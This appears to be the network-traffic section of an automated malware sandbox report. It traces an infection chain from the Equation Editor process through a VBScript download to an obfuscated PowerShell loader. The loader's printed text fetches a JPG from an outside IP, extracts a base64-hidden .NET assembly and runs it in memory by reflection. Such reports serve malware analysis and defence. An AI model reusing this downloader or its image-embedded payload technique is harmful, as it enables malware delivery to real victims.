                  Jul 5, 2024 06:23:58.295169115 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295176983 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.295213938 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295258045 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.295335054 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295341015 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295352936 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295399904 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.295494080 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295531988 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295537949 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295550108 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295583010 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.295666933 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295732975 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295738935 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295782089 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.295902967 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295909882 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295922995 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295928001 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.295958042 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.296123981 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.296129942 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.296144009 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.296149015 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.296175003 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.296205044 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.296212912 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.296224117 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.296258926 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379373074 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379381895 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379395008 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379409075 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379415989 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379422903 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379430056 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379487038 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379493952 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379525900 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379539013 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379545927 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379550934 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379617929 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379650116 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379663944 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379681110 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379692078 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379710913 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379724026 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379735947 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379743099 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379782915 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379833937 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379839897 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379846096 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379853010 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379868984 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379884958 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379899979 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379924059 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379976988 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.379985094 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.379993916 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380013943 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380019903 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380033970 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380048990 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380060911 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380079031 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380084991 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380098104 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380135059 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380151033 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380157948 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380170107 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380194902 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380201101 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380201101 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380208015 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380243063 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380419016 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380425930 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380438089 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380444050 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380474091 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380515099 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380526066 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380538940 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380546093 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380553961 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380558968 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380565882 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380584002 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380597115 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380686045 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380692005 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380705118 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380743980 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380778074 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380783081 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380795956 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380801916 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380832911 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380903006 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380908966 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380914927 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380922079 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380934954 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380942106 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380947113 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380949020 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380954027 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380970955 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380970955 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.380986929 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.380994081 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.381000042 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.381005049 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.381032944 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.381051064 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.384635925 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384651899 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384658098 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384665012 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384696960 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.384747028 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384768009 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384783983 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384792089 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.384798050 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384804964 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384815931 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384819984 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.384828091 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384836912 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384839058 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.384843111 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384850025 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.384865046 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.384996891 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385003090 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385015965 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385051012 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.385062933 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385080099 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385087013 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385092974 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385098934 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385124922 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.385211945 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385219097 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385237932 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385243893 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385257006 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385265112 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385271072 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385273933 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.385289907 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.385298967 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.385318041 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385443926 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385451078 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385462999 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385503054 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.385507107 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385514021 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385525942 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385531902 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385565042 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.385591030 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385596991 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385611057 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385616064 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385626078 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385629892 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.385643959 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.385679960 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.468777895 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.468786001 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.468794107 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.468848944 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.468905926 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.468911886 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.468925953 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.468930006 CEST8049164192.3.216.148192.168.2.22
                  Jul 5, 2024 06:23:58.468978882 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.599968910 CEST4916480192.168.2.22192.3.216.148
                  Jul 5, 2024 06:23:58.600054026 CEST4916380192.168.2.2291.92.254.194
                  Jul 5, 2024 06:23:59.028116941 CEST4916580192.168.2.22208.95.112.1
                  Jul 5, 2024 06:23:59.033133984 CEST8049165208.95.112.1192.168.2.22
                  Jul 5, 2024 06:23:59.033195019 CEST4916580192.168.2.22208.95.112.1
                  Jul 5, 2024 06:23:59.033638000 CEST4916580192.168.2.22208.95.112.1
                  Jul 5, 2024 06:23:59.038877964 CEST8049165208.95.112.1192.168.2.22
                  Jul 5, 2024 06:23:59.532336950 CEST8049165208.95.112.1192.168.2.22
                  Jul 5, 2024 06:23:59.737714052 CEST4916580192.168.2.22208.95.112.1
                  Jul 5, 2024 06:23:59.742104053 CEST8049165208.95.112.1192.168.2.22
                  Jul 5, 2024 06:23:59.745179892 CEST4916580192.168.2.22208.95.112.1
                  Jul 5, 2024 06:24:00.400887966 CEST804916291.92.254.29192.168.2.22
                  Jul 5, 2024 06:24:00.400953054 CEST4916280192.168.2.2291.92.254.29
                  Jul 5, 2024 06:24:00.444818020 CEST4916280192.168.2.2291.92.254.29
                  Jul 5, 2024 06:24:00.449580908 CEST804916291.92.254.29192.168.2.22
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 5, 2024 06:23:59.009582043 CEST5456253192.168.2.228.8.8.8
                  Jul 5, 2024 06:23:59.019061089 CEST53545628.8.8.8192.168.2.22
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 5, 2024 06:23:59.009582043 CEST192.168.2.228.8.8.80x635bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 5, 2024 06:23:59.019061089 CEST8.8.8.8192.168.2.220x635bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                  • 192.3.216.148
                  • 91.92.254.29
                  • 91.92.254.194
                  • ip-api.com
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.2249161192.3.216.148802772C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 06:23:53.154741049 CEST328OUTGET /datingloverstartingAgain.vbs HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 192.3.216.148
                  Connection: Keep-Alive
                  Jul 5, 2024 06:23:53.745280027 CEST980INHTTP/1.1 200 OK
                  Content-Type: text/vbscript
                  Content-Encoding: gzip
                  Last-Modified: Thu, 04 Jul 2024 18:10:08 GMT
                  Accept-Ranges: bytes
                  ETag: "0402a673dceda1:0"
                  Vary: Accept-Encoding
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 04:23:53 GMT
                  Content-Length: 705
                  Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dc 96 4d 8f d2 60 10 c7 e7 6c e2 77 20 1c 36 9a 28 8b 44 0f 98 78 60 2b 76 d9 ad 85 15 9a 1a 2e 06 5a 16 4a 79 a7 ac a4 1f 5e fd cd d0 9a 4d 3c 78 6f 9e f4 79 9b 99 ff cc 7f 9e b7 fe fe f5 59 12 59 4b 4d f6 12 48 44 7d e0 5b d2 1f ca 23 fd a9 4c 68 53 99 4b cc bc 2b 0e 65 45 bb 94 9c da 93 07 39 a1 93 cb 37 b9 47 63 06 d6 ad 1c 99 39 a1 3d 34 3b 45 8b 4c ba 91 05 36 1b be 00 49 84 f5 91 de 4c 06 e2 4b 07 0c 1f bb 00 69 8c 8f 88 76 8b 56 8a 65 8e c7 14 db 58 76 12 a2 13 22 db 31 9f d0 f3 89 20 a4 ef 4a 06 5e 02 fa 1b b8 a8 cc c5 b3 f2 f1 cd ef 51 6e f0 74 44 b2 66 7c 06 db 63 e6 01 bd 05 0c 73 64 5b 62 0d 18 ef 41 72 f1 32 86 83 c7 cc 98 91 6b 48 aa bb a6 f7 88 77 9f 91 63 0c 3c ca 80 08 27 e6 27 22 13 3e ad c7 4c 02 52 8e fd 1c af 29 1e 1c fc 86 48 7c e9 a3 17 a2 7f 0f ef a9 c5 1e 80 e9 60 71 42 a2 31 9c d1 1b cb 4b 79 41 16 67 c8 ab b3 3e 35 f9 c4 e7 10 fb 8c d8 33 ea 3e 36 4b da 88 d1 2b a9 cb 57 22 fb 4e ed 49 4b 1a c6 ff 20 4f 56 5f 66 6f 65 44 19 a0 f9 da 32 54 95 [TRUNCATED]
                  Data Ascii: M`lw 6(Dx`+v.ZJy^M<xoyYYKMHD}[#LhSK+eE97Gc9=4;EL6ILKivVeXv"1 J^QntDf|csd[bAr2kHwc<''">LR)H|`qB1KyAg>53>6K+W"NIK OV_foeD2T4TQ.,`d|kJ[$ 2Q~@z06"2yMvi*MP'XnAS9mN( ]~>G9k-SvrZsvVT0*lvo\>__o@pswG?%*>l<2c3S}h*s9;Cclc[6yXGoDtYx+a7*p'pi]QWMUr=o;V[<l;#6M-5umZ="wvwt'


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.224916291.92.254.29801968C:\Windows\SysWOW64\wscript.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 06:23:54.234648943 CEST213OUTGET /Users_API/BrainiacMAX/file_njk01aso.gqz.txt HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: 91.92.254.29
                  Jul 5, 2024 06:23:54.876627922 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 04:23:54 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Thu, 04 Jul 2024 18:10:08 GMT
                  ETag: "564-61c6fdb667da7"
                  Accept-Ranges: bytes
                  Content-Length: 1380
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Data Raw: ef bb bf 28 28 27 62 79 36 6c 69 6e 6b 20 3d 20 45 6e 4e 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 35 34 2e 31 39 34 2f 69 6d 67 65 2f 6e 65 77 2d 69 6d 61 67 65 5f 76 2e 6a 70 67 45 6e 4e 3b 20 62 79 36 77 65 62 43 6c 69 65 6e 74 20 3d 27 2b 27 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 27 2b 27 65 74 2e 57 65 62 43 6c 69 65 6e 74 3b 20 74 72 27 2b 27 79 20 7b 20 62 79 36 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 3d 20 62 27 2b 27 79 36 77 65 62 43 6c 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 62 79 36 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 20 7b 20 57 72 69 74 65 27 2b 27 2d 48 27 2b 27 6f 73 74 20 45 6e 4e 46 61 69 6c 65 64 20 54 6f 20 64 6f 77 6e 6c 6f 61 64 20 64 61 74 27 2b 27 61 20 66 27 2b 27 72 6f 6d 20 62 79 36 6c 69 6e 6b 45 6e 4e 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 3b 20 65 78 69 74 20 7d 3b 20 69 66 20 28 62 79 36 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 2d 6e 65 20 62 79 36 6e 75 6c 6c 29 20 7b 20 62 79 36 69 6d 61 27 2b 27 [TRUNCATED]
                  Data Ascii: (('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command);
                  Jul 5, 2024 06:23:54.876672983 CEST455INData Raw: 62 79 36 6c 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 27 2b 27 6f 61 64 28 62 79 36 63 6f 6d 6d 61 6e 64 42 79 74 65 73 29 3b 20 62 79 36 74 27 2b
                  Data Ascii: by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptth


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.224916391.92.254.19480540C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 06:23:55.952363014 CEST83OUTGET /imge/new-image_v.jpg HTTP/1.1
                  Host: 91.92.254.194
                  Connection: Keep-Alive
                  Jul 5, 2024 06:23:56.579201937 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 04:23:56 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
                  ETag: "67fd9-61c57a629b9c6"
                  Accept-Ranges: bytes
                  Content-Length: 425945
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/jpeg
                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                  Jul 5, 2024 06:23:56.579233885 CEST1236INData Raw: 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 05 2b
                  Data Ascii: C.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:{
                  Jul 5, 2024 06:23:56.579250097 CEST1236INData Raw: e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c
